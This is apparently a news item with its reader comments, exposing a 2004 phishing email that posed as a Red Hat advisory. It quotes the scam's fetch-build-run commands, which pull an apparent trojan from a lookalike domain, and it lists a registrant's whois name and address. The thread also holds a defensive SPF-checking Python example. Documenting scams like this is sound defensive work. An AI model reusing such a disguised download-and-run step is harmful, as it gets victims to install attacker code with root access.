Fake Red Hat security update
Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat
A complete revision history is at the end of this file.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

- First download the patch from the Security RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
- Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
- cd fileutils-1.0.6.patch
- make
- ./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

Thank you for your prompt attention to this serious matter,
RedHat Security Team

Copyright © 2004 Red Hat, Inc. All rights reserved.
Fake Red Hat security update
Posted Oct 25, 2004 13:41 UTC (Mon) by haydentech (guest, #22504)
I swear, if any scammers ever bothered to learn correct English grammar or the art of spellchecking, we'd all be in trouble. Fortunately, they seem obstinately opposed to those ideas.
Fake Red Hat security update
Posted Oct 26, 2004 0:35 UTC (Tue) by Ross (subscriber, #4065)
Or learn how companies write their own name, or bother to even make the message remotely similar to real Red Hat advisories. If they were smart they would have made the "update" an RPM. I see no reason not to, and the fact the patch was a tarfile with a Makefile and a script would be plenty to tell it is fake by itself.
Fake Red Hat security update
Posted Oct 28, 2004 8:43 UTC (Thu) by lacostej (subscriber, #2760)
Doesn't Red Hat sign their packages? If so a fake RPM would have been detected.
Fake Red Hat security update
Posted Oct 29, 2004 21:52 UTC (Fri) by giraffedata (subscriber, #1954)
They're not opposed, they just aren't very smart. It's fortunate for society that the Hollywood criminal mastermind is largely a myth. Most criminals are stupid; smart people have other avenues available to achieve their goals (good job, etc.).
Fake Red Hat security update
Posted Oct 25, 2004 13:53 UTC (Mon) by alex (subscriber, #1355)
Does the email contain an attachment or is the file hosted on the site? If it's hosted on the site surely it's an easy task to trace the domain owner and charge them?
Fake Red Hat security update
Posted Oct 25, 2004 13:55 UTC (Mon) by busterb (subscriber, #560)
Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES
Admin Name........... Raymond Jackson
Tech Name............ YahooDomains TechContact
Fake Red Hat security update
Posted Oct 25, 2004 14:38 UTC (Mon) by pascal.martin (subscriber, #2995)
The ZIP code is for Atwater, CA, not New York City, NY (NYC is 01xxx.. is anyone checking addresses at the registrars?). There is a 224 Cedar Avenue there, though..
A Raymond Jackson lives there, according to the Yahoo phone book.
I suggest to be polite and not overflow the guy with phone calls: there is no proof he is not a victim as well..
It seems the site was taken down.
The script is SOOOOOO silly
Posted Oct 25, 2004 14:35 UTC (Mon) by jeld (guest, #22397)
These guys have no imagination. So, did anyone notify addlebrain.com that one of their boxen was rooted?
The script is SOOOOOO silly
Posted Oct 25, 2004 14:44 UTC (Mon) by pascal.martin (subscriber, #2995)
http://addlebrain.com was running Microsoft-IIS on Windows Server 2003 when last queried (Netcraft).
Not a root kit & no comment..
The script is SOOOOOO silly
Posted Oct 25, 2004 15:06 UTC (Mon) by jeld (guest, #22397)
Obviously it is not running IIS anymore; it runs some sort of Apache. Here is the transcript:
HEAD / HTTP/1.0
HTTP/1.1 200 OK
addlebrain.com
Posted Oct 26, 2004 1:57 UTC (Tue) by jtc (guest, #6246)
I missed where addlebrain.com fits into this, but I get the following results from HEAD:
$ HEAD addlebrain.com
addlebrain.com
Posted Oct 26, 2004 2:54 UTC (Tue) by jeld (guest, #22397)
Well... looks like you are right, except that addlebrain.com (running IIS 6) is being redirected to www.addlebrain.com running Apache. Since this is a valid site, and the email address where the script is sending cracked host info is root@addlebrain.com, I figured that someone rooted one of addlebrain's boxes. Otherwise I don't know. addlebrain.com seems to belong to a company called ABM Wireless which sells cell phone accessories. The MX record for addlebrain.com points to a server in the everyone.net domain, which is a mail hosting company. I cannot find much info about the addlebrain.com IP address, but the www.addlebrain.com address belongs to a dedicated web server/colocation company, ThePlanet.com.
Fake Red Hat security update
Posted Oct 25, 2004 16:08 UTC (Mon) by JoeBuck (subscriber, #2330)
This shows that it was a very wise decision to add digital signatures to RPMs, and to have the rpm program verify those signatures before installation. If it were not for that, these guys could have packaged their trojan as an RPM, and with suitable trickery they might even have misled people into thinking they were getting the RPM off of a Red Hat site. But an RPM that is not signed with a key that is already loaded into the rpm database will not install.
Fake Red Hat security update
Posted Oct 25, 2004 16:51 UTC (Mon) by utidjian (subscriber, #444)
"But an RPM that is not signed with a key that is already loaded into the rpm database will not install."

That is not quite true... at least not on any Red Hat or Fedora Core systems I have. It is true that 'yum update', 'apt-get update' and up2date will not, by default, install any unsigned or incorrectly signed packages. However, a simple 'rpm -ivh someunsignedpackage.rpm' will just go right ahead and install it.

-DU-...etc...
Fake Red Hat security update
Posted Oct 25, 2004 16:42 UTC (Mon) by csm1975 (guest, #15864)
SPF would prevent this sort of email from being accepted by the victim. Red Hat *DOES* have proper SPF records in DNS.
;; ANSWER SECTION:
So... if persons who received this email were to implement SPF on their end they would not get another one of these that "purported" to be from redhat.com.
http://spf.pobox.com for more information.
Fake Red Hat security update
Posted Oct 25, 2004 18:25 UTC (Mon) by admcd (subscriber, #5415)
Would SPF have prevented this?
What if the e-mail came from the fedora-redhat.com domain given in the e-mail? The owner of that fake domain could even have published SPF records for it, if they really wanted to.
Fake Red Hat security update
Posted Oct 25, 2004 19:45 UTC (Mon) by csm1975 (guest, #15864)
My SPF config would have...
If it had come from the fedora-whatever site it would not have, but that wouldn't have been much of a phishing attempt, would it?
Fake Red Hat security update
Posted Oct 26, 2004 7:35 UTC (Tue) by admcd (subscriber, #5415)
In which case you wouldn't have clicked on the www.fedora-redhat.com link. So SPF would have made no difference either way.
Fake Red Hat security update
Posted Nov 4, 2004 15:41 UTC (Thu) by job (subscriber, #670)
No, SPF would not have prevented that. The sender would have said "MAIL FROM: myownsite.com", and "From: security@redhat.com" to you, and you would be none the wiser. How often do you read your mail transactions to catch that suspicious looking line? Most people never have. Yet everyone and their dog wants to have opinions about how mail transport is done. Learning how it works is much wiser, but few do.
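The point job makes above, worked through as an added example (not code from this thread or from any SPF implementation): a minimal SPF evaluator over constructed records, plus the envelope/header alignment check that SPF alone does not perform. The SPF records, the header block and the address 203.0.113.5 are all assumed test data, not the real records of either domain.

```python
import ipaddress
import re

# Constructed SPF records standing in for DNS TXT lookups (assumed values using
# documentation address ranges; not the real records of either domain).
SPF_RECORDS = {
    "redhat.com": "v=spf1 ip4:192.0.2.0/24 -all",
    "fedora-redhat.com": "v=spf1 ip4:203.0.113.0/24 -all",
}
QUALIFIER_RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def spf_check(domain, client_ip):
    """Minimal SPF evaluator: handles ip4:, include: and the all mechanism."""
    record = SPF_RECORDS.get(domain.lower())
    if record is None or not record.startswith("v=spf1"):
        return "none"
    ip = ipaddress.ip_address(client_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        if mech == "all":
            return QUALIFIER_RESULT[qualifier]
        if mech == "ip4" and ip in ipaddress.ip_network(arg, strict=False):
            return QUALIFIER_RESULT[qualifier]
        if mech == "include" and spf_check(arg, client_ip) == "pass":
            return QUALIFIER_RESULT[qualifier]
    return "neutral"  # nothing matched and no explicit all mechanism


def evaluate(envelope_from, client_ip, headers):
    """Run SPF on the envelope sender, then compare it with the header From:.

    Returns (spf_result, header_from_domain, aligned). SPF only ever sees the
    envelope (MAIL FROM) domain; the alignment flag is the extra check that
    catches a passing envelope paired with a forged From: header."""
    env_domain = envelope_from.rsplit("@", 1)[1].lower()
    match = re.search(r"^From:.*?([\w.+-]+@[\w.-]+)", headers, re.MULTILINE)
    hdr_domain = match.group(1).rsplit("@", 1)[1].lower() if match else ""
    return spf_check(env_domain, client_ip), hdr_domain, env_domain == hdr_domain


# Constructed header block mimicking the fake advisory, and an attacker IP
# inside fedora-redhat.com's (constructed) permitted range.
HEADERS = "From: RedHat Security Team <security@redhat.com>\nSubject: update\n"
ATTACKER_IP = "203.0.113.5"

if __name__ == "__main__":
    print(evaluate("security@redhat.com", ATTACKER_IP, HEADERS))      # envelope forged: SPF fail
    print(evaluate("news@fedora-redhat.com", ATTACKER_IP, HEADERS))   # own domain: SPF pass, misaligned
```

The first case is the one csm1975's SPF setup rejects; the second passes SPF and is only flagged by the envelope/header mismatch, which is the gap job describes.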
Fake Red Hat security update
Posted Oct 25, 2004 18:52 UTC (Mon) by ccchips (guest, #3222)
I just re-read the "announcement" here.
wget?
I have a thought:
This person may be out to prove that Linux is no longer as secure as we'd like now that the average Joe can get 'hold of it, and now that it's becoming popular.
Myself, I would have caught this on a number of points:
However, I am almost certain that some Windows users would have fallen for this, and I can't help but wonder if this clown was after newly-migrated Windows users.
Fake Red Hat security update
Posted Oct 26, 2004 9:06 UTC (Tue) by hppnq (guest, #14462)
I got one today that claimed to be Microsoft's. Same story, but it did look a lot more professional (working links to microsoft.com, graphics and all). I didn't have a chance to disassemble the attached update; it was removed by my ISP. Sigh.
Fake Red Hat security update
Posted Oct 28, 2004 3:02 UTC (Thu) by marduk (subscriber, #3831)
I don't think they're out to "prove" anything regarding Linux. These are the same kinds of people who send out the fake PayPal/Citibank registration emails. They're not trying to make a statement, just trying to screw over some poor soul. The only real difference is that these guys know how to use the command line...
Fake Red Hat security update
Posted Oct 28, 2004 16:26 UTC (Thu) by bod (subscriber, #17096)
> wget?
Nothing wrong with wget. Debian security advisories routinely include
Note however that DSAs are both signed and include MD5 sums for the updated
Fake Red Hat security update
Posted Oct 28, 2004 19:57 UTC (Thu) by Alan_Hicks (subscriber, #20469)
> Security patch announcements from reputable companies don't come by e-mail

You just called Slackware Inc. an irreputable company by inference. Granted, Slackware Inc. only sends security advisories out by the mailing list, so if you meant that they don't randomly send out e-mails to users, you're correct. Of course, those e-mails (as well as the packages) are digitally signed, meaning you can verify if it really did come from Slackware Inc. or not.
Fake Red Hat security update
Posted Oct 28, 2004 22:19 UTC (Thu) by BackSeat (subscriber, #1886)
> Security patch announcements from reputable companies don't come by e-mail
Most mainstream distributions have a security email list (SuSE, Gentoo, Debian, etc).
security patch announcements by email
Posted Oct 29, 2004 21:49 UTC (Fri) by giraffedata (subscriber, #1954)
A lot of people would say it's irresponsible of a company not to email its customers and tell them they need a security patch. I'm not a customer of any companies that distribute security patches, but I do occasionally get an email from my ISP urging me to get recent Windows updates.
Copyright © 2004, Eklektix, Inc.